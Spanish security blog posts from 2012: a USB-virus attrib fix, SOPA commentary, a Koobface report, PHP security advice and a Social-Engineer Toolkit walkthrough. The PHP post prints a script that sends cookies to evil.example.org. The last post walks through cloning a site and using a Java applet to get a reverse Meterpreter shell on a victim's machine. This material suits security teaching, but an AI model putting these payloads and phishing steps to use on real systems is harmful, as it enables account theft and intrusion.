2012/01/20

Truco: Como ver Carpetas y archivos ocultos por un virus en una USB

memoriausb Truco: Como ver Carpetas y archivos ocultos por un virus en una USB
En mi escuela constantemente utilizamos los laboratorios de computo , muchos alumnos al día utilizan dichas computadoras , las cuales no tienen una protección antivirus eficiente por lo que la mayoría de estas computadoras se encuentran infectadas por algún tipo de virus pero la gran parte por el denominado virus Recycler , el cual oculta las carpetas o archivos de nuestra usb y por mas que tratamos de ver los archivos no es posible , solamente escribiendo el nombre de la carpeta en la barra de direcciones.
Este es un pequeño truco para poder ver de nuevo esas carpetas y archivos ocultos:
El primer paso es conectar nuestra memoria USB y observar que letra se le asigna a dicha unidad, en este caso será la letra F:
  1. Inicio > Ejecutar (también podemos presionar las teclas Windows + R)
  2. Escribimos cmd y pulsamos Enter
  3. Ahora escribiremos lo siguiente :
    attrib -s -h -r f:/*.* /s /d
    La letra f: habrá que cambiarla por la letra de la unidad que ha sido asignada a tu memoria (Puedes verlo desde Mi PC o Mi Equipo)
  4. Pulsamos Enter
  5. Listo!
Ahora podremos ver nuestros archivos y carpetas nuevamente, aunque siempre lo mas importante es analizar nuestra memoria con un antivirus actualizado y comprobar que nuestro sistema no esta infectado también.
Lo vi en | CypherHackz

2012/01/19

Mafalda y la SOPA

Imagino que todos, estos días estáis viendo post sobre la Ley que quiere Imponer Estados Unidos, ley que posiblemente nos afectara a todos. Además varios sitios cerraron ayer sus paginas y publicaciones como señal de protesta.

Pero ¿en que nos afecta la Ley SOPA?, pues nadie mejor que Mafalda para explicarnos lo que podría suceder, este enlace de http://www.voolive.net/otra-vez-sopa-by-mafalda/2012/01/09/ que me paso un amigo y no tiene desperdicio.






Desde Seguridad a lo Jabalí no apoyamos ninguna Ley o Proyecto que amenace nuestras libertades fundamentales, entre las cuales esta la de Expresión, Comunicacion y Difusión del Conocimiento!!!


No!!! ....... a la Ley SOPA !!!!

Koobface: la intocable mafia de hackers rusos

cibercriminales
Se estima que al banda ingresó unos US$2 millones anuales empleando el gusano informático Koobface.
Las autoridades dicen que son cinco, saben sus nombres y apellidos, se conoce con exactitud desde dónde operan y que en los últimos tres años se han embolsado millones de dólares filtrando un gusano informático en redes sociales como Facebook o Twitter. Aún así la justicia internacional todavía no ha podido tocarles.
La banda de hackers -llamada Koobface- lleva al menos tres años operando desde su central de San Petersburgo, en Rusia, desafiando a diario la seguridad de las redes sociales y logrando controlar decenas de miles de computadoras en todo el mundo.
Esta semana, varios grupos de investigación, que trabajan en coordinación con Facebook y el FBI, dieron a conocer sus identidades, expresando cierta "frustración" ante la imposibilidad de hacer que se presenten cargos en su contra, dicen, por falta de pruebas físicas.

Cómo funcionan

Desde 2008, el supuesto grupo de ciberdelincuentes distribuye a través de las redes sociales vínculos a videos curiosos o de contenido sexual para que los usuarios ingresen.
A continuación, reciben un mensaje para actualizar su versión de Flash, lo que permite al gusano Koobface entrar en el sistema sin que el usuario lo note.
Así es como pasan a formar parte de la red de 800.000 computadores que se estima podría haber controlado la banda.
Al controlar estos computadores y cuentas, se tiene acceso a todo tipo de información sobre el usuario; desde nombre, dirección, email, teléfono, así como sus preferencias de búsqueda. Datos que según, los investigadores, se vendía a "empresarios sin escrúpulos".
Se calcula que así se embolsaron unos US$2 millones anuales, y se sabe, gracias a las fotografías que colgaron en sus perfiles en redes sociales, que sus miembros han invertido parte de este dinero en lujosas vacaciones a Monte Carlo, Bali y Turquía.
Se dispone incluso de imágenes de su sede en San Petersburgo, en donde puede verse a los miembros del grupo empleando computadoras Machintosh como lo harían jóvenes emprendedores de Silicon Valley.

"Muy seguros"

cibercriminales
Las investigaciones apuntan a que la banda opera en una de las oficinas alojadas en el piso superior de este edificio en San Petersburgo.
Graham Cluley, consultor de la firma tecnológica Sophos, empresa que esta semana publicó una investigación en profundidad sobre la banda, dijo a la BBC que estan "bastante seguros" de haber identificado a las personas correctas, aunque apuntó "por supuesto, tenemos que asumir que cualquiera es inocente hasta que se demuestra su culpabilidad".
"Es muy difícil estar 100% seguros de estas cosas, pero las pruebas son bastante contundentes para nosotros. Realmente, hay suficientes evidencias para investigar a esta gente".
Sin embargo, ninguno de los miembros ha sido arrestado en conexión a Koobface. "Tan sólo necesitamos que la policía rusa investigue esto y les detenga".

Paraíso hacker

Rusia es conocida por ser uno de los mayores paraísos para la piratería informática en el mundo, algo que se remonta a la caída de la Unión Soviética, que coincidió con la era de internet a principios de la década de los '90.
Un sistema educativo con énfasis en la matemática y la ingeniería dio cabida a una generación de sofisticados informáticos, pero de salarios muy inferiores a las mentes de Silicon Valley o sus homólogos en Europa, lo habría llevado a que muchos se pongan al servicio de las mafias que se lucran de la piratería.
Un estudio publicado en 2011 por el fabricante de programas Symantec, señaló que el cibercrimen en el mundo genera unos ingresos de US$114.000 millones anuales.

Simples "entusiastas" informáticos

cibercriminales
Se ha recopilado todo tipo de información sobre los miembros de la banda que estaba disponible en redes sociales.
En el caso de la banda Koobface, los investigadores les describen como simples entusiastas informáticos y reconocen que sus tácticas son mucho menos agresivas que otros piratas de su clase.
De hecho, en 2009 llegaron al punto de dejar una felicitación de navidad electrónica destinada a los investigadores, oculta en un computador infectado, en la que prometían que nunca robarían información de tarjetas de crédito o datos bancarios.
Con el tiempo, las pesquisas fueron revelando cada vez más detalles sobre la banda, en parte gracias a los esfuerzos de otro aficionado a la tecnología, el joven alemán Jan Drömer, quien se hizo con información de todo tipo en internet.
Así obtuvieron datos de la vida de Avdeyko, el más veterano y de quien se sospecha que es el líder, y quién estuvo implicado anteriormente en otro programa malicioso distribuido en la red.
Se sabe de otros, como Korotchenko, que trató de emprender negocios legítimos como la empresa de programas MobSoft

La venganza de Facebook

Recientemente, según dicen frustrados por la "lentitud" de las autoridades rusas a la hora de tomar cartas en el asunto, expertos en seguridad de la red social Facebook decidieron llevar a cabo un ataque por su cuenta, lo que, afirman, habría obligado a la banda a abandonar sus operaciones.
La acción coordinada, aseguraron miembros de Facebook, habría desmantelado su centro de operaciones y eliminado el gusano informático de su red y de los computadores infectados.
Pero aún así, Facebook dice no clamar victoria. No hasta que los autores del cibercrimen sean llevados a la justicia.
En este sentido, la ofensiva de los investigadores ha sido poner a disposición del público sus identidades.
"En un mundo ideal sus identidades nunca hubieran sido dadas a conocer al público" expresó Cluley, "pero el conejo está fuera de su madriguera y debemos usar una táctica distinta".

Tutoriales de Backtrack 5

Mucha gente coincide en que Backtrack 5 es la mejor distribución para tests de intrusión. Tanto si habéis trabajado ya con ella como si no, os recomendamos echar un vistazo a alguno de los numerosos tutoriales del blog Ethical Hacking:

Apple amplía su presencia sobre los escritorios de las empresas

Las oficinas de General Electric Co. podrían parecer el último lugar donde uno espera encontrar computadoras portátiles y de escritorio de Apple Inc., pero la tecnología se está filtrando poco a poco en la rutina cotidiana del conglomerado formado hace 120 años.
Bajo un programa piloto lanzado hace un año, los trabajadores de GE pueden elegir entre las computadoras portátiles y de escritorio de Apple o una PC con Windows. En la actualidad, la empresa cuenta con 1.000 usuarios de Mac y espera que su presencia se expanda a medida que los empleados se familiaricen con el programa.
[wsjamd1jan19]

Apple, sin embargo, incursiona en un terreno que no domina: GE tiene en torno a 330.000 computadoras, la mayoría de las cuales son PC que operan con software de Windows.
Apple se ha dedicado a promocionar sus productos entre clientes corporativos, dependiendo en gran parte de la iniciativa de los empleados para pedirles a sus jefes que soporten los aparatos que utilizan en casa.
El mercado corporativo de Apple es muy pequeño pero está creciendo, según la firma de investigación Forrester Research, que calcula que la compañía de Cupertino, California, venderá en torno a US$9.000 millones en Macs y US$10.000 millones en iPads a empresas este año, un alza de casi 50% frente a 2011.
En comparación, el gasto empresarial en PC y tabletas de otros fabricantes caerá 3% este año, para bordear los US$69.000 millones, proyecta Forrester.
Expandir su presencia en un conglomerado de las dimensiones de GE constituye un importante impulso para Apple y ejerce presión sobre los fabricantes que actualmente proveen computadoras a la compañía, incluyendo Dell Inc. y Lenovo Group Ltd. Esta iniciativa trae a colación la incursión inicial de Apple en el mercado de teléfonos inteligentes, donde a poco andar se volvió una verdadera amenaza para compañías como Research In Motion Ltd., fabricante del BlackBerry.
En 2008, GE empezó ofreciéndoles a sus empleados el iPhone como una alternativa a los BlackBerry. Ahora, dice que alrededor de 10.000 trabajadores de GE utilizan el teléfono de Apple, en comparación con unos 50.000 que siguen con los BlackBerry.
GE no ha promocionado el programa internamente a los cuatro vientos y muchos empleados lo desconocen.
Sin embargo, los empleados de todas las divisiones de GE tienen acceso al programa, siempre y cuando no haya restricciones de seguridad, como en el caso de aparatos que se utilizan para misiones de defensa, ni grandes problemas de compatibilidad con el software necesario.
"Todos los negocios están participando de alguna manera para hacer que esta (opción) esté al alcance de sus empleados", dijo Greg Simpson, director de tecnología de GE.
Apple es el tercer fabricante que más computadoras vende en Estados Unidos, con aproximadamente 11% del mercado, comparado con el casi 23% del líder Hewlett-Packard Co., según las firmas de investigación Gartner y IDC. En el cuarto trimestre de 2011, entre los cinco fabricantes que más computadoras vendieron en EE.UU., Apple fue el único que registró una expansión en sus ventas.
La participación de Apple en el mercado corporativo, no obstante, es mucho más pequeña, menos de 1%, mientras que H-P, Dell y Lenovo acaparan en torno a 25% cada una.
Dell no quiso comentar al respecto. Lenovo tampoco, pero acaba de lanzar una costosa campaña de marketing para fortalecer su marca entre los consumidores. H-P dijo que es consciente de que Apple está incursionando en el mercado corporativo y se está esforzando para hacer que sus laptops sean más delgadas, ligeras, pequeñas y elegantes.
"Conseguiremos lo mejor de ambos mundos y ofreceremos un producto ganador en ese espacio", dijo Carol Hess, directora del departamento de PC comercial de H-P.
El costo y la compatibilidad con sistemas existentes sigue siendo un obstáculo que frena el avance de Apple en las compañías, señala Rich Adduci, jefe del departamento de tecnologías de la información en Boston Scientific Corp. "La realidad es que hacen un producto excelente, pero hay algunos desafíos de compatibilidad con nuestra infraestructura informática", añadió.
Pero ese no es el caso para el iPad. El fabricante de equipos médicos se asoció con Apple el día después de que lanzó la computadora tipo tableta para utilizar el aparato en su equipo de ventas y ha comprado unos 4.500 que se usan en todo el mundo.
Durante la reunión anual de liderazgo que se celebró este mes en Florida, los 600 mayores ejecutivos de GE vinieron equipados con un iPad. "Existe una curva de aprendizaje y reconocemos que aún no funciona a la perfección", dijo Simpson, de GE. "Creo que la demanda (entre los empleados) seguirá creciendo".

El impacto de #SOPA y #PIPA para América Latina

En las últimas semanas nuestra amada casa el Internet ha sido inundada con dos palabras #SOPA y #PIPA. Dos palabras que pueden significar muchas cosas en los próximos días. Dos palabras que pueden no solo marcar la historia sino definirla. Hemos visto centenares de Twitts, miles de facebook status, blogs, artículos, etc. Dos palabras que contradicen cualquier principio sobre el cual el Internet fue fundado y que sus creadores recalcan en una carta enviada con el afán de que no se apoyen estas medidas. Abuelos del Internet como Paul Vixie, creador de BIND, Jim Gettys, editor del estándar HTTP 1.1, advierten que lo que quieren hacer contradice y ensucia todo lo que el Internet hoy en día es.

Después de leer lo suficiente y aplicando un concepto que acabo de aprender, el informarse con el fin de recibir información para luego procesarla sin importar nuestra opinión acerca de lo que estamos leyendo o nuestra posición con la misma, puedo decir que ya tengo una opinión bien formada y estructurada de lo que estas dos palabras pueden significar en nuestro presente y futuro.

SOPA o “Stop Online Piracy Act” con esto las distintas compañías que hoy lucran con nuestro dinero quieren detener la piratería en Internet utilizando un concepto llamado DNS Blocking, como ustedes saben existen las direcciones IP y cuando nosotros escribimos en un browser una dirección web como www.wikipedia.org el DNS se encarga de buscar la ip asignada a ese nombre y nos lleva al servidor donde esta hospedada esa pagina, con el DNS Blocking lo que hacen es que cada vez que nosotros escribamos www.wikipedia.org y si según el criterio de ellos esta contiene algo que viola su acta, esta se verá bloqueada y no se podrá accesar. Lo mismo sucede con PIPA “Protect IP Act”, en la que cualquier compañía puede censurar cualquier tipo de material que considere. Borrarlo del internet!

Por ejemplo si yo tengo mi sitio web y en el pongo un video de una canción que me gusto y ellos consideran que eso es piratería pues simplemente bloquean mi sitio web y punto! Ustedes pensaran, bueno que importa al fin y al cabo solo es mi sitio web. Pero que pasaría si es el sitio web de alguien que se dedica al comercio electrónico, o de alguien que ofrece servicios y su principal cliente es el mercado gringo. Bueno dicen ustedes me quedo sin ese mercado.

Ahora les hago una pregunta: Saben ustedes donde están hospedadas la mayor parte de las paginas web de latinoamerica y donde están registrados la mayoría de los dominios .com, .net, .org, etc. De latinoamerica? Respuesta: En USA. Que gran golpe el que nos dimos creyendo que los siempre libres, soberanos e independientes gringos respetarían nuestros derechos. Confiando en que sus economías de escala nos permitían obtener mejores recursos informáticos a precios más competitivos. En la situación actual ellos tendría el dominio o potestad de bloquear, borrar, censurar o hacer lo que se les dé la gana con por lo menos un 80% de las páginas web de Latinoamérica. Entonces el problema no solo es que los gringos no puedan ver nuestras páginas sino que también pueden hacer lo que quieran con nuestras páginas y dominios registrados en USA. 

Todos piensan detengamos SOPA y PIPA, yo no! Yo digo hagamos algo para demostrar que los que mandamos somos los consumidores, los que tenemos el poder de compra y el poder de consumo somos nosotros y ninguna organización tiene el derecho de obligarnos a hacer algo que no queremos y mucho menos a faltarle el respeto a nuestra libertad.

Una de las personas que ha influido mucho en mi vida no solo por sus inventos sino por su filosofía es Steve Jobs, su mayor logro con el iPhone no fue el iPhone en sí. Fue decirles a las compañías telefónicas que era lo que él quería en su teléfono y con que tenían que cumplir ellos para poder tenerlo y venderlo. Rompió el paradigma de que los teléfonos se hacían como las telefónicas querían, el hizo las telefónicas funcionar para su teléfono.

A que quiero llegar con esto?

Que pasaría si todos usáramos un estándar de redes sociales con xml, y en vez de estar alimentando al panzón de Facebook (el cual también desaparecería si se llega a firmar SOPA o PIPA), se imaginan que cada quien pudiera decidir cómo se va desplegar la información de sus amigos en una red social, el poder decidir que quiero ver y que no, que desplegar y que no. A mis amigos del Open Source que les parecería esto? Que importa si quitan Facebook, hay miles de jóvenes creativos y emprendedores capaces de crear mil Facebook, les quitaríamos su big brother!

Que pasaría si en vez de que los artistas se dejen exprimir por las disqueras grandes intentaran llegar al publico de otra forma, utilizando otros medios innovadores, en vez de tener un manager tuvieran un social manager? A mis amigos del social media e internet marketing que les parece esto? De igual forma estoy seguro que hoy en día hay muchos jóvenes que no necesitan de una radio para tener su programa, la creatividad en esta época está de moda!

Creo que es tiempo de que dejemos de engordar a esos dinosaurios que hoy tiemblan ante nosotros los jóvenes, ante nuestra capacidad de innovar, ante nuestra creatividad, yo no veo esto más que como patadas de ahogado. Patadas que dan porque se les han acabado las ideas, su capacidad de innovación llego a la cúspide con el CD o con el BluRay. Es tiempo de que los que pagamos por los servicios podamos decidir sobre lo que pagamos. Piénsenlo, será realmente malo que esto llegue a pasar? No es acaso la capacidad de adaptarse a las condiciones adversas y la necesidad en tiempos crueles lo que ha llevado al hombre a desarrollar cosas que había soñado mas no realizada?

Entonces mis queridos amigos, es hora de tomar los teclados y comenzar a construir la internet del futuro, el mismo gobierno nos está dando la oportunidad de comenzar todo de 0. No hay que tener miedo hay que ser valientes y luchar por la libertad de nuestra red. Es momento de darle vuelta a la tortilla, de dejar de depender de los gringos y tomar partido y participar en la creación del futuro y no solo observar y esperar a ver que nuevo sale. Es hora de desempolvar el baul de las ideas porque como dijo Víctor Hugo “Ningún ejercito puede detener una idea a la que le ha llegado su momento”.

World IPv6 Launch, el evento definitivo para impulsar IPv6

Se acabaron las tonterías. Nos hemos quedado sin direcciones IPv4 y hay que mudarse a IPv6 si queremos seguir disfrutando de este maravilloso ecosistema llamado Internet. Todo el mundo lo sabe, especialmente las grandes tecnológicas, varias de las cuales se unirán este próximo 6 de junio al evento World IPv6 Launch, una ceremonia organizada por la Internet Society para darle el empujón definitivo a la nueva versión del protocolo IP.
A diferencia de lo que ocurrió en el World IPv6 Day celebrado el 8 de junio de 2011, durante el que más de mil sitios web fueron accesibles por IPv6 unas 24 horas para probar la fiabilidad de la nueva versión del protocolo, en esta ocasión varias compañías con mucho peso dentro del sector tecnológico relacionado con Internet activarán permanentemente el renovado esquema de direccionado de 128 bits.
Entre las empresas confirmadas que se unirán a la fiesta -en la que cualquier otra compañía puede participar- encontramos un poco de todo. Desde mastodontes de Internet como Google o Facebook, hasta grandes fabricantes de hardware como Cisco, pasando por ISPs de la talla de AT&T, Free Telecom y Comcast.
Obviamente aunque los nombrados, más los que se vayan uniendo, muden a IPv6 el 6 de junio seguirá faltando camino por recorrer pero el evento supone todo un hito igualmente. Se trata del disparo de salida definitivo para el despliegue a nivel mundial.
¿Y qué pasará con todos los que no tenemos ni idea de lo que estás hablando? En principio absolutamente nada. El cambio a IPv6 es transparente para el usuario final y aunque por ejemplo determinado ISP se mude, salvo contadísimas excepciones los usuarios no tendrán que tocar nada para poder seguir accediendo a Internet (se calcula que solamente el 0,05% de todos los usuarios conectados podrían sufrir algún tipo de problema).
Por último para más información sobre IPv6 y su despliegue, recomiendo visitar la pequeña web que Google habilitó en su momento en el marco del World IPv6 Day.

Seguridad en redes Wi-Fi (intypedia)

Bernardo explica a Alicia cómo deben configurarse las redes inalámbricas Wi-Fi para tener un acceso y navegación seguros y además protegerse ante diversos tipos de ataque.

2012/01/17

Seguridad en PHP

Escribir aplicaciones PHP no es extremadamente difícil. Pero muchos olvidan los aspectos de seguridad que deben ser tenidos en cuenta al implementar estas aplicaciones.

A veces no se piensa en el daño que puede sufrir un sitio web hasta que ya es demasiado tarde.

Se debe empezar a diseñar con cabeza y no ser meros robots codificando. Veamos un poco más a fondo las posibles amenazas y recomendaciones para hacer que nuestro sitio web sea un poco más seguro.

Inyección SQL

Este ataque se produce cuando un atacante ejecuta sentencias SQL en la base de datos del sitio web, insertando en un campo del formulario sentencias SQL dentro de otra sentencia SQL haciendo que se ejecute la sentencia invasora.

Se recomienda:
  • Filtrar los datos. Por ejemplo, si tenemos en nuestro formulario el campo username, y sabemos que los usuarios sólo pueden estar compuestos por letras y números, no se deben permitir caracteres como " ' " o " = " . O si se trata del campo e-mail, podemos utilizar expresiones regulares para validarlo, como preg_match('/^.+@.+\..{2,3}$/',$_POST['email'])
  • Usar funciones que escapan caracteres especiales de una cadena para su uso en una sentencia SQL, como mysql_real_escape_string(), la cual coloca barras invertidas antes de los siguientes caracteres: \x00, \n, \r, \, ', " y \x1a. O addslashes(), (la directiva de PHP magic_quotes_gpc está activada por defecto, y básicamente ejecuta la función addslashes() en todos los datos GET, POST, y COOKIE. No se debe utilizar addslashes() en las cadenas que ya se han escapado con magic_quotes_gpc ya que se hará un doble escape).

XSS (Cross Site Scripting)


Las vulnerabilidades de XSS permiten ejecutar código de scripting en el contexto del sitio web:
  • Explotando la confianza que tiene un usuario de un sitio web. Puede que los usuarios no tengan un alto nivel de confianza en un sitio web, pero sí el navegador. Por ejemplo, cuando el navegador envía cookies en una petición.
  • Haciendo que los sitios web muestren datos externos. Como aplicaciones de mayor riesgo que incluyen foros, clientes de correo web, o contenido de RSS.
  • Cuando los datos externos no se filtran adecuadamente un atacante puede inyectar un contenido. Esto es tan peligroso como dejar que el atacante edite código en el servidor.
Un usuario que ejecute este código con JavaScript activado en su navegador será redireccionado a evil.example.org, y las cookies asociadas al sitio web serán incluidas en la consulta:
<script>document.location = 
'http://evil.example.org/steal_cookies.php?cookies=' + 
document.cookie</script>
Se recomienda:
  • Filtrar todos los datos externos. El filtrado de datos es la práctica más importante que se puede adoptar. Al validar todos los datos externos a medida que entran y salen de la aplicación se mitigarán la mayoría de las preocupaciones del XSS.
  • Utilizar las funciones que tiene PHP que ayudan al filtrado. Pueden ser útiles htmlentities () que convierte caracteres a entidades HTML, strip_tags () que elimina las etiquetas HTML y PHP de una cadena y utf8_decode ().
  • Basarse en listas blancas. Supongamos que los datos no son válidos hasta que no se pruebe que lo son. Esto implica verificar la longitud y asegurar que sólo los caracteres válidos son permitidos. Por ejemplo, si se inserta el nombre y apellidos, se debe asegurar que sólo se permiten letras y espacios. Por ejemplo Berners-Lee se consideraría nula, pero esto se puede arreglar añadiendo este nombre a la lista blanca. Es mejor rechazar datos válidos que aceptar datos maliciosos.
  • Utilizar una convención de nomenclatura estricta. Una convención de nomenclatura puede ayudar a los desarrolladores a distinguir entre datos filtrados y sin filtrar.

CSRF (Cross Site Request Forgery)

Explota la confianza que tiene un sitio web en la identidad de un usuario.

Un ejemplo sería enviar los siguientes datos en la petición:
GET  /buy.php?symbol=SCOX&amp;quantity=1000 HTTP/1.1
Host:  stocks.example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml,  image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234
Se recomienda:
  • Utilizar POST en lugar de GET en los formularios. Sobre todo cuando se esté realizando una acción que involucra una compra.
  • Utilizar $_POST en lugar de confiar en register_globals. Utilizar el método POST es inútil si se confía en register_globals y se referencian variables como $symbol o $quantity. Lo mismo sucede si se utiliza $_REQUEST.
  • Generar un token único para cada petición y verificarlo posteriormente.
Directory Transversal

Este ataque se produce cuando se especifican rutas de ficheros como "../../../../file" en los datos del formulario y mediante un script se llama a estos ficheros. Proporcionando a un atacante la posibilidad de realizar cambios en el sistema de ficheros.

Si dentro del script de PHP se incluye: require $page . '.php'; Sabiendo que esta página se almacena en /home/someone/public_html/index.php, un atacante podría hacer index.php?page=../secret accediendo a /home/someone/secret.php

Se recomienda:
  • Tener un array de páginas válidas.
  • Comprobar que el archivo solicitado coincide con un formato concreto.

RFI (Remote File Inclusion)


Como su nombre indica, se produce cuando se incluye un archivo remoto.

Por ejemplo, si existe un archivo en la ruta http://example.com/malice.php y nuestro script se encuentra en http://site.com/index.php. Un atacante puede hacer esta petición: http://site.com/index.php?page=http://example.com/malice lo que provocará que el archivo se ejecute y escriba un nuevo fichero en disco. Pudiendo ser este fichero una shell que permita la ejecución de comandos.

O por ejemplo, asignar a page el valor http://example.com/malice.php? seguido de una consulta a base de datos.

Se recomienda:
  • No confiar en los datos que no provengan de nuestro sistema.
  • Se deben validar los datos que introduce el usuario.

Seguridad en sesiones


Las sesiones y las cookies pueden ser usadas para comprometer las cuentas de los usuarios. Cuando se almacena una cookie en el ordenador esta puede ser modificada por el usuario.

Se recomienda:
  • Cambiar el identificador de la sesión a menudo. Utilizando la función session_regenerate_id() se reduce la posibilidad de que el identificador sea interceptado.
  • Usando versiones PHP5.2 o posteriores se puede denegar al Javascript del navegador el acceso a la cookie activando el flag httponly.
Esta es una pequeña muestra de recomendaciones que hará que nuestra aplicación PHP sea algo más segura.

Vector de Ataque Web con Social-Engineer Toolkit (SET)

Social-Engineer Toolkit (SET) es un conjunto de colección de scripts en Python especialmente diseñadas para realizar ataques de ingeniería social en procesos de auditorias de seguridad. Esta herramienta fue creada por David Kennedy (ReL1K), el mismo creador de otra herramienta muy popular llamada Fast-Track, que también es una herramienta que automatiza algunos ataques más comunes y más usados en las pruebas de penetración (penetration test) mediante algunos scripts hechos en Python.

Social-Engineer Toolkit (SET) nos permite crear archivos PDF, sitios web falsos y enviar correos electrónicos con código malicioso incrustado, por cierto también se integra con el Metasploit Framework.

Como bien sabran y se han dado cuenta, la ingeniería social no es nada nuevo, los ataques de ingeniería social están ahora en su punto más alto, es decir en pleno auge y siempre han sido un gran riesgo para muchas organizaciones. Una persona que esta tratando de convencer a otras personas para que realicen actos que normalmente no harian es muy antigua como la misma historia de la tierra :D

Muchos creen que la ingeniería social es uno de los mayores riesgos que enfrentan las organizaciones actualmente, ya que es muy difícil proteger a las organizaciones de estos ataques. Por ejemplo puede que se acuerden del ataque a Google, del llamado “Operación Aurora” (también conocida como Comele o Hydraq) en el que la técnica de ingeniería social fue utilizada para atacar a Gmail y otras fuentes de Google.

Un vector de ataque es la vía que se utiliza para obtener información o acceso a un determinado sistema y la herramienta Social-Engineer Toolkit (SET) clasifica a los ataques por vectores de ataques web, correo, electrónico y también los ataques basados en USB. Utiliza correo electrónico, sitios web falso y otros vectores que típicamente lo que hacen es engañar a los usuarios a comprometer la información sensible. Cada vector puede tener éxito o todo lo contrario, dependiendo del objetivo a atacar y también el tipo de comunicación utilizada. SET también viene con correos electrónicos y plantillas de páginas web ya predefinidas que pueden ser utilizadas para los ataques de ingeniería social, también utiliza la herramienta Metasploit Framework. Así que en este post se mostrara un ejemplo de vector de ataque basado en web, manos a la obra y listos para la primera prueba.

Herramientas Utilizadas

Instalación de Social Engineer Toolkit (SET)

La instalación de SET es sencilla, lo que necesitamos es tener instalado Phyton y Metasploit Framework, ambas herramientas están instaladas en la distribución de BackTrack y no hay que preocuparnos por nada sobre cosas de la configuración e instalación, solo tenemos que tener actualizados a las versiones más recientes. Pero si requieren instalarlo en alguna otra distribución diferente, solo abrir la consola y teclear o copiar el siguiente comando.
svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Después de ejecutar el comando anterior, tendremos un nuevo directorio que contiene todas herramientas necesarias para la ejecución de Social-Engineer Toolkit (SET).

Ejecutando Social-Engineer Toolkit (SET)

Para ejecutar SET es un proceso sencillo, ya que solo tenemos que abrir una terminal o consola y simplemente tenemos que teclear ./set. Bueno lo primero tenemos que estar en el directorio donde tenemos la herramienta, en BackTrack se encuentra en el directorio /pentest/exploits/set/. Lo haremos de la siguiente manera.
root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# ls
config modules readme reports set set-automate set-proxy set-update setup.py set-web src
root@bt:/pentest/exploits/set# ./set
Ejecución de Social-Engineer Toolkit (SET).

El comando ./set inicia la ejecución de SET y nos muestra el menú inicial. En este post veremos un ejemplo de un vector de ataque basado en web, clonando un sitio web y utilizando el método de ataque de Java Applet.

Website Attack Vectors

Los vectores de ataque web son probablemente uno de los aspectos más avanzados e interesantes de esta herramienta ya que están especialmente diseñados para ser de un aspecto muy creíble y de una apariencia muy atractiva para la víctima. Esta herramienta puede clonar sitios web que son idénticos a los sitios de confianza que normalmente visita un usuario normal, esto asegura a la víctima de que aparentemente está visitando un sitio legítimo.

Java Applet Attack

Uno de los ataques basados en un sitio web que tienes disponible Social-Engineer Toolkit (SET), es el ataque de Java Applet (Java Applet Attack), es uno de los vectores de ataque más exitoso de esta herramienta. Este ataque malicioso lo que hace es mostrar un applet de Java en el navegador web invitando a que el usuario de clic, en este caso a ejecutar el applet. Este ataque no se considera una vulnerabilidad de Java.

Para ejecutar este ataque en el menú principal de SET debemos primero elegir la opción 2, Website Attack Vectors. Al elegir la esta opción, nos mostrara en consola las siguientes opciones.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate

Java Applet Attack Method

Elegimos la opción 1, Java Applet Attack Method y nos mostrara lo siguiente.


Elegimos la opción que 1 o 2, en mi caso la opción 2 donde pongo el sitio a clonar, en mi caso puse mi blog, delfirosales.blogspot.com y se generara la clonación del sitio.

Hemos creado un servidor de alojamiento con un sitio web clonado en este caso, el sitio es mi blog delfirosales.blogspot.com.
En el siguiente paso dependiendo del escenario u objetivo elegimos la opción adecuada, en mi caso realice la prueba con la opción 2, Windows Reverse_TCP Meterpreter.


Después elegimos el backdoor, en mi caso elegí la opción 16, Backdoored Executable (BEST), elegimos el puerto, esperamos a que se genere la configuración y esperamos a que cargue Metasploit Framework.


Ahora que tenemos todo listo, solo tenemos que tener un objetivo a atacar para que navegue a través del sitio malicioso. Al llegar a la pagina web, la victima se le mostrar una advertencia pop-up tal como se muestra en la siguiente figura.


Si la victima da clic en Ejecutar (que por cierto la mayoría de los usuarios la hacen) el exploit será ejecutado y con esto tendremos acceso y el control total del sistema de la victima, en este caso la maquina con Windows XP SP3, tal y como se muestran en las siguientes imágenes.


De vuelta en nuestro equipo atacante, la sesión de Meterpreter se ha establecido correctamente y ahora tenemos el acceso a la maquina de la victima, tal como se muestra.